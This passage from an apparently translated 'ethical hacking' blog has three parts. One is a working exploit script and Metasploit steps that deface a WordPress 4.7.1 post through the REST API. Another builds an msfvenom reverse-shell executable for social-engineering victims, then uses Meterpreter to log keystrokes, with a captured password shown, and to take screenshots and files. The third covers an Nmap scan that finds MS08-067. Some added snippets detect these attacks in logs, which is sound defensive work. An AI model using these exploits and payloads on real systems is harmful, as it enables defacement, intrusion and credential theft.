def get_api_url(wordpress_url):
    # the REST API base URL is advertised in a <link rel="https://api.w.org/"> tag
    response = urllib2.urlopen(wordpress_url)

    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]

    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')

    return u


def get_posts(api_base):
    response = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(response.read())

    for post in posts:
        print(' - Post ID: {0}, Title: {1}, Url: {2}'
              .format(post['id'], post['title']['rendered'], post['link']))


def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    })

    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    # passing a body makes urllib2 send a POST request
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()

    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))


def print_usage():
    print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))


if __name__ == '__main__':

    # ensure we have at least a url
    if len(sys.argv) < 2:
        print_usage()
        sys.exit(1)

    # if we have a post id, we need content too
    if 2 < len(sys.argv) < 4:
        print('Please provide a file with post content with a post id')
        print_usage()
        sys.exit(1)

    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {0}'.format(api_url))

    # if we only have a url, show the posts we have
    if len(sys.argv) < 3:
        print('* Getting available posts')
        get_posts(api_url)

        sys.exit(0)

    # if we get here, we have what we need to update a post!
    print('* Updating post {0}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.readlines()

    update_post(api_url, sys.argv[2], ''.join(new_content))

    print('* Update complete!')

Once the file has been created or downloaded, run it as follows:

user@workstation:~> python inject.py 
Usage: inject.py <url> (optional: <post_id> <file with post_content>)
user@workstation:~>

If inject.py is run without arguments, the program shows its usage information.

user@workstation:~> python inject.py http://chit-test.ch
* Discovering API Endpoint
* API lives at: http://chit-test.ch/wp-json/
* Getting available posts
 - Post ID: 1, Title: Ciao mondo!, Url: http://chit-test.ch/ciao-mondo/
user@workstation:~>

If inject.py is run with only the URL, the program lists the existing posts with their IDs, which is useful if you do not know the ID of the post you want to modify.

Once you know the ID, prepare the text file containing the text to be used to modify the post.

user@workstation:~> vi content

Enter the text you want to use in the file (in this example: Sei stato hackerato, aggiorna WordPress!, that is "You have been hacked, update WordPress!"), then save and exit.

Now run inject.py with the post ID and the text file just created.

user@workstation:~> python inject.py http://chit-test.ch 1 content
* Discovering API Endpoint
* API lives at: http://chit-test.ch/wp-json/
* Updating post 1
* Post updated. Check it out at http://chit-test.ch/ciao-mondo/
* Update complete!
user@workstation:~>
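As an added example (not part of the original post, of WordPress, or of Metasploit), here is detection logic for the request pattern the script above produces: a write to the wp/v2/posts/<id> route that also carries an id query parameter that differs from the route id (such as ?id=1abc). On 4.7.0/4.7.1 the query-string id takes precedence over the route id, the permission check finds no post for the non-numeric value and lets the request through, and the update then casts it back to the numeric id. The Apache combined-format log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (Apache combined format): one successful
# injection, one rejected attempt via the ?rest_route= fallback, and noise.
SAMPLE_LOG = """\
203.0.113.7 - - [22/May/2019:18:12:03 +0200] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 1843 "-" "Python-urllib/2.7"
203.0.113.7 - - [22/May/2019:18:12:05 +0200] "POST /wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1" 200 2210 "-" "Python-urllib/2.7"
198.51.100.2 - - [22/May/2019:18:13:10 +0200] "POST /wp-json/wp/v2/posts/1 HTTP/1.1" 401 97 "-" "Mozilla/5.0"
192.0.2.9 - - [22/May/2019:18:14:00 +0200] "POST /?rest_route=/wp/v2/posts/1&id=1abc HTTP/1.1" 403 120 "-" "curl/7.64.0"
10.0.0.5 - - [22/May/2019:18:15:00 +0200] "POST /wp-json/wp/v2/posts/1?id=1 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
POSTS_ROUTE_RE = re.compile(r"^/wp/v2/posts/(?P<id>\d+)/?$")


def rest_route(target):
    """Return (route, query) for a request target, handling both the pretty
    /wp-json/<route> form and the ?rest_route=<route> form used when
    permalinks are disabled. route is None for non-REST requests."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.startswith("/wp-json/"):
        return parts.path[len("/wp-json"):], query
    if "rest_route" in query:
        return query["rest_route"][0], query
    return None, query


def classify(line):
    """Return an alert dict when a write to a single-post route carries an
    id query parameter that is not exactly the route id, else None."""
    m = LOG_RE.match(line)
    if not m or m.group("method") not in WRITE_METHODS:
        return None
    route, query = rest_route(m.group("target"))
    if route is None:
        return None
    r = POSTS_ROUTE_RE.match(route)
    if not r:
        return None
    query_id = query.get("id", [None])[0]
    # Benign: no id override, or an override identical to the route id.
    if query_id is None or query_id == r.group("id"):
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "post_id": r.group("id"),
        "query_id": query_id,
        "status": status,
        # A 2xx means the site accepted the write: the post was modified.
        "outcome": "succeeded" if 200 <= status < 300 else "blocked",
    }


def scan_log(text):
    """Run classify() over every line and keep the alerts."""
    return [a for a in (classify(line) for line in text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("%(time)s %(ip)s post %(post_id)s via id=%(query_id)s -> "
              "%(status)d (%(outcome)s)" % alert)
```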

WordPress REST API Content Injection Exploit with Metasploit

To exploit this vulnerability, use the Metasploit module auxiliary/scanner/http/wordpress_content_injection. First, find the ID of the post you want to modify: set the action to LIST with the command "set ACTION LIST". For more information, see the link provided by WPScan: https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_content_injection

msf > use auxiliary/scanner/http/wordpress_content_injection
msf auxiliary(scanner/http/wordpress_content_injection) > show actions

Auxiliary actions:

Name    Description
----    -----------
LIST    List posts
UPDATE  Update post

msf auxiliary(scanner/http/wordpress_content_injection) > set ACTION LIST
ACTION => LIST
msf auxiliary(scanner/http/wordpress_content_injection) > set RHOSTS chit-test.ch
RHOSTS => chit-test.ch
msf auxiliary(scanner/http/wordpress_content_injection) > show options

Module options (auxiliary/scanner/http/wordpress_content_injection):

Name           Current Setting  Required  Description
----           ---------------  --------  -----------
POST_CONTENT                    no        Post content
POST_ID        0                no        Post ID (0 for all)
POST_PASSWORD                   no        Post password ('' for none)
POST_TITLE                      no        Post title
Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS         chit-test.ch     yes       The target address range or CIDR identifier
RPORT          80               yes       The target port (TCP)
SSL            false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI      /                yes       The base path to the wordpress application
THREADS        1                yes       The number of concurrent threads
VHOST                           no        HTTP server virtual host

Auxiliary action:

Name  Description
----  -----------
LIST  List posts

msf auxiliary(scanner/http/wordpress_content_injection) > run

Posts at http://10.10.10.4/ (REST API: /wp-json/wp/v2)
======================================================

ID  Title                 URL                              Password
--  -----                 ---                              --------
1   Ciao mondo!  http://chit-test.ch/ciao-mondo/  No

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/wordpress_content_injection) >

Once you know the ID of the post you want to modify, set the action to UPDATE and fill in the remaining information, such as the post content, the title and so on.

msf auxiliary(scanner/http/wordpress_content_injection) > set ACTION UPDATE
ACTION => UPDATE
msf auxiliary(scanner/http/wordpress_content_injection) > set POST_CONTENT "Sei stato hackerato, aggiorna WordPress!"
POST_CONTENT => Sei stato hackerato, aggiorna WordPress!
msf auxiliary(scanner/http/wordpress_content_injection) > set POST_TITLE "Sei stato hackerato!"
POST_TITLE => Sei stato hackerato!
msf auxiliary(scanner/http/wordpress_content_injection) > set POST_ID 1
POST_ID => 1
msf auxiliary(scanner/http/wordpress_content_injection) > show options

Module options (auxiliary/scanner/http/wordpress_content_injection):

   Name           Current Setting                           Required  Description
   ----           ---------------                           --------  -----------
   POST_CONTENT   Sei stato hackerato, aggiorna WordPress!  no        Post content
   POST_ID        1                                         no        Post ID (0 for all)
   POST_PASSWORD                                            no        Post password ('' for none)
   POST_TITLE     Sei stato hackerato!                      no        Post title
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         chit-test.ch                              yes       The target address range or CIDR identifier
   RPORT          80                                        yes       The target port (TCP)
   SSL            false                                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                                         yes       The base path to the wordpress application
   THREADS        1                                         yes       The number of concurrent threads
   VHOST                                                    no        HTTP server virtual host


Auxiliary action:

   Name    Description
   ----    -----------
   UPDATE  Update post


msf auxiliary(scanner/http/wordpress_content_injection) > run

[+] SUCCESS: http://10.10.10.4/?p=1 (Post updated)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/wordpress_content_injection) > 

Once the WordPress 4.7.1 vulnerability has been exploited successfully, take a look at the targeted site to see whether it really worked.
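From the defender's side, both inject.py and the Metasploit module above modify a post through the REST API single-post route, so the web server access log is where the change is recorded. The following is an added example, not code from the original post or from either tool: it scans combined-format access log lines (all constructed samples) for write requests to /wp-json/wp/v2/posts/<id> and tallies them per source address.

```python
"""Added example, not part of the original post or of the tools it uses: scan
combined-format web server access log lines for write requests to the WordPress
REST API single-post route (/wp-json/wp/v2/posts/<id>), the route the content
injection shown above modifies posts through. All log lines are constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Combined log format: host ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
# Pretty route, or the ?rest_route= form WordPress accepts when permalinks are off
POST_ROUTE_RE = re.compile(
    r'^/wp-json/wp/v2/posts/(?P<id>\d+)|^/\?rest_route=/wp/v2/posts/(?P<id2>\d+)'
)
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


@dataclass
class Finding:
    ip: str
    time: str
    method: str
    post_id: int
    status: int
    user_agent: str


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def post_id_from_path(path: str) -> Optional[int]:
    """Post ID addressed by a wp/v2 single-post route (query string ignored), else None."""
    m = POST_ROUTE_RE.match(path)
    if not m:
        return None
    return int(m.group("id") or m.group("id2"))


def find_post_writes(lines: List[str]) -> List[Finding]:
    """One Finding per request that uses a write method against a single-post route.

    Legitimate editors also write through this route, so the result is a review
    list: compare each source IP and user agent with the site's known editors.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] not in WRITE_METHODS:
            continue
        pid = post_id_from_path(rec["path"])
        if pid is None:
            continue
        findings.append(Finding(rec["ip"], rec["time"], rec["method"], pid,
                                int(rec["status"]), rec["ua"]))
    return findings


def writes_by_source(findings: List[Finding]) -> Dict[str, int]:
    """Number of post writes per client IP, so an unexpected source stands out."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.ip] = counts.get(f.ip, 0) + 1
    return counts


# Constructed sample: two writes to post 1 from one address, plus ordinary read traffic.
SAMPLE_LOG = """\
10.10.10.3 - - [22/May/2019:18:07:18 +0200] "GET /wp-json/ HTTP/1.1" 200 1532 "-" "python-requests/2.21.0"
10.10.10.3 - - [22/May/2019:18:07:19 +0200] "POST /wp-json/wp/v2/posts/1 HTTP/1.1" 200 2231 "-" "python-requests/2.21.0"
10.10.10.5 - - [22/May/2019:18:09:01 +0200] "GET /ciao-mondo/ HTTP/1.1" 200 9931 "-" "Mozilla/5.0"
10.10.10.5 - - [22/May/2019:18:10:44 +0200] "GET /wp-json/wp/v2/posts/1 HTTP/1.1" 200 2231 "-" "Mozilla/5.0"
10.10.10.3 - - [22/May/2019:18:12:40 +0200] "POST /?rest_route=/wp/v2/posts/1 HTTP/1.1" 200 2231 "-" "Mozilla/5.0"
""".splitlines()


if __name__ == "__main__":
    found = find_post_writes(SAMPLE_LOG)
    for f in found:
        print(f"{f.time} {f.ip} {f.method} post {f.post_id} -> HTTP {f.status} [{f.user_agent}]")
    print("writes per source:", writes_by_source(found))
```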



Ethical Hacking – Metasploit, Msfvenom and Meterpreter

on 17 May 2019 at 14:29
Posted in: Ethical Hacking / Penetration Testing, Security / Anonymity

Normally Metasploit is used to exploit vulnerabilities in applications present on the system; with Msfvenom it is possible to create a standalone file containing a payload to be executed by the targeted person. This can be very useful in situations where social engineering tactics are used.

To get information about msfvenom run the command "msfvenom -h".

Choosing the payload to use with Msfvenom (Metasploit)

To display a list of available payloads run the command msfvenom -l payloads.

msf > msfvenom -l payloads
[*] exec: msfvenom -l payloads


Framework Payloads (539 total) [--payload ]
==================================================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS

....................................................................................................

    windows/x64/vncinject/bind_tcp_uuid                 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)
    windows/x64/vncinject/reverse_http                  Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)
    windows/x64/vncinject/reverse_https                 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)
    windows/x64/vncinject/reverse_tcp                   Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)
    windows/x64/vncinject/reverse_tcp_rc4               Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker
    windows/x64/vncinject/reverse_tcp_uuid              Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)
    windows/x64/vncinject/reverse_winhttp               Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)
    windows/x64/vncinject/reverse_winhttps              Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)
msf >

In this example use windows/meterpreter/reverse_tcp, which generates a reverse shell that connects to LHOST (the IP address of the system the attack is run from) on port 888 as soon as the file is executed.

Viewing the options with Msfvenom (Metasploit)

msf > msfvenom -p windows/meterpreter/reverse_tcp --list-options
Options for payload/windows/meterpreter/reverse_tcp:
=========================


       Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
     Module: payload/windows/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 283
       Rank: Normal

Provided by:
    skape <mmiller@hick.org>
    sf <stephen_fewer@harmonysecurity.com>
    OJ Reeves
    hdm <x@hdm.io>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Description:
  Inject the meterpreter server DLL via the Reflective Dll Injection 
  payload (staged). Connect back to the attacker
msf > 

As the command output shows, the missing information to add is LHOST, the IP address of the system the attack is run from.

Choosing the format with Msfvenom (Metasploit)

To see a list of the available formats use the command msfvenom --list formats. In this example the target system is Windows, so the ".exe" file extension will be used.

msf > msfvenom --list formats
[*] exec: msfvenom --list formats

Framework Executable Formats [--format ]
===============================================

Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war

Framework Transform Formats [--format ]
==============================================

Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript

msf >

Creating a standalone payload with Metasploit's Msfvenom

Once the payload has been chosen, the executable file can be created. Use "-f" to specify the file type.

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.3 LPORT=888 -f exe > file.exe

The Metasploit multi/handler module

At this point we need a handler to establish a connection once the victim runs the executable. To do so, use the multi/handler module with the command "use multi/handler" and set the payload and its options as done earlier when creating the exe file with msfvenom. When done, run the exploit command and have the victim run the file right afterwards. A command prompt will open: the meterpreter.

msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 10.10.10.3
LHOST => 10.10.10.3
msf exploit(multi/handler) > set LPORT 888
LPORT => 888
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.3:888 
[*] Sending stage (179779 bytes) to 10.10.10.6
[*] Meterpreter session 1 opened (10.10.10.3:888 -> 10.10.10.6:49157) at 2019-05-17 13:57:28 +0200

meterpreter >

Using Metasploit's Meterpreter

Meterpreter – Help

The help command gives a list of the available commands with a description of each.

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter >

Meterpreter – Keyscan (Keylogger)

Keyscan is a keylogger with which the keyboard activity of the target can be monitored.

meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
facebook.com
emailvittimagmail.comPassword88
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >

In this example you can see that the victim went to facebook.com and right afterwards entered the username (the e-mail address) and the password.

Meterpreter – Edit (Vi)

With the edit command text files can be edited or new ones created using the Vi text editor, which is the default editor. Press the Insert key, add some text, leave the mode with Esc and run "wq!".

meterpreter > edit hackerato.txt

Meterpreter – Pwd, cd, ls

With meterpreter you can use Unix commands such as pwd, cd, ls and so on.

meterpreter > pwd
C:\Users\Chit
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Chit\Desktop
=========================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   4096  dir   2019-05-14 17:13:48 +0200  BookApp
100666/rw-rw-rw-  282   fil   2019-05-14 16:36:40 +0200  desktop.ini
100666/rw-rw-rw-  21    fil   2019-05-17 13:02:28 +0200  hackerato.txt

Meterpreter – Screenshot

With this command you can take screenshots of the victim's desktop.

meterpreter > screenshot
Screenshot saved to: /root/psthIJvn.jpeg
meterpreter > 


Meterpreter – Download

With this command files can be downloaded from the targeted system.

meterpreter > download hackerato.txt
[*] Downloading: hackerato.txt -> hackerato.txt
[*] Downloaded 21.00 B of 21.00 B (100.0%): hackerato.txt -> hackerato.txt
[*] download   : hackerato.txt -> hackerato.txt
meterpreter >

Ethical Hacking – Testing security – Nmap and Metasploit

on 4 March 2019 at 15:26
Posted in: Ethical Hacking / Penetration Testing, Security / Anonymity

In this example we will test the security of a hypothetical client on the network running an old, unpatched operating system. The IP address of the client to test is 10.10.10.7; the operating system in use is Windows XP PRO SP3 and it is not updated. I deliberately chose an old, unpatched system to make preparing the exercise easier and to be sure of finding serious vulnerabilities to exploit; the procedure is nonetheless the same for more modern systems.

Vulnerability scanning with Nmap

workstation:/home/chit # nmap --script vuln 10.10.10.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 01:12 CET
Nmap scan report for 10.10.10.7
Host is up (0.00032s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E5:BD:58 (Oracle VirtualBox virtual NIC)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 41.40 seconds
workstation:/home/chit #

To detect the operating system in use, use Nmap's -O option.

workstation:/home/chit # nmap -O 10.10.10.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 19:16 CET
Nmap scan report for 10.10.10.7
Host is up (0.00038s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E5:BD:58 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.83 seconds
workstation:/home/chit #

As the scan results show, Nmap detected two serious vulnerabilities in the tested system and identified the operating system in use (Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2). In this example I created a virtual machine and I know that the target in question is Microsoft Windows XP SP3 Italian. The vulnerability we will look at in detail and exploit is MS08-067, a vulnerability that allows commands to be executed remotely on the targeted system.
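Reading the --script vuln output by eye is error-prone: the same section mixes VULNERABLE results with "false", script errors and checks that could not run (NT_STATUS_ACCESS_DENIED), and only the first kind should go into a remediation list. The following is an added example, not code from the original post or from Nmap: it parses the host script section above (abridged, copied from the scan output) into structured findings with state, CVE IDs, disclosure date and risk factor.

```python
"""Added example, not part of the original post or of Nmap itself: parse the
"Host script results" section of an Nmap --script vuln report into structured
findings, so that only scripts that actually reported VULNERABLE are acted on
and errors or inconclusive checks are not mistaken for either outcome."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "| name:" / "|_name:" opens a script block; deeper-indented lines belong to that block
SCRIPT_HEADER_RE = re.compile(r'^\|_? ?(?P<name>[\w-]+):\s*(?P<rest>.*)$')
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,}')


@dataclass
class ScriptResult:
    name: str
    state: str                      # VULNERABLE, NOT VULNERABLE, ERROR or UNKNOWN
    title: Optional[str] = None
    cves: List[str] = field(default_factory=list)
    disclosure: Optional[str] = None
    risk: Optional[str] = None
    detail: Optional[str] = None    # raw text of a one-line result (error, status code)


def _state_from_header(rest: str) -> str:
    """Map the text after 'script-name:' on a one-line result to a state."""
    if rest == "":
        return "UNKNOWN"            # a multi-line block follows; its 'State:' line decides
    if rest == "false":
        return "NOT VULNERABLE"
    if rest.startswith("ERROR"):
        return "ERROR"
    return "UNKNOWN"                # e.g. NT_STATUS_ACCESS_DENIED: the check did not run


def parse_host_scripts(report: str) -> List[ScriptResult]:
    """Return one ScriptResult per NSE script found in the report's '|' prefixed lines."""
    results: List[ScriptResult] = []
    current: Optional[ScriptResult] = None
    expect_title = False
    for raw in report.splitlines():
        if not raw.startswith("|"):
            continue                # port table, banner and timing lines
        header = SCRIPT_HEADER_RE.match(raw)
        if header:
            rest = header.group("rest").strip()
            current = ScriptResult(name=header.group("name"),
                                   state=_state_from_header(rest),
                                   detail=rest or None)
            results.append(current)
            expect_title = False
            continue
        if current is None:
            continue
        body = raw.lstrip("|_ ").strip()
        if not body:
            continue
        if expect_title:            # the line right after 'VULNERABLE:' is the finding title
            current.title, expect_title = body, False
        elif body == "VULNERABLE:":
            expect_title = True
        elif body.startswith("State:"):
            current.state = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):
            current.cves.extend(CVE_RE.findall(body))
        elif body.startswith("Disclosure date:"):
            current.disclosure = body.split(":", 1)[1].strip()
        elif body.startswith("Risk factor:"):
            current.risk = body.split(":", 1)[1].strip()
    return results


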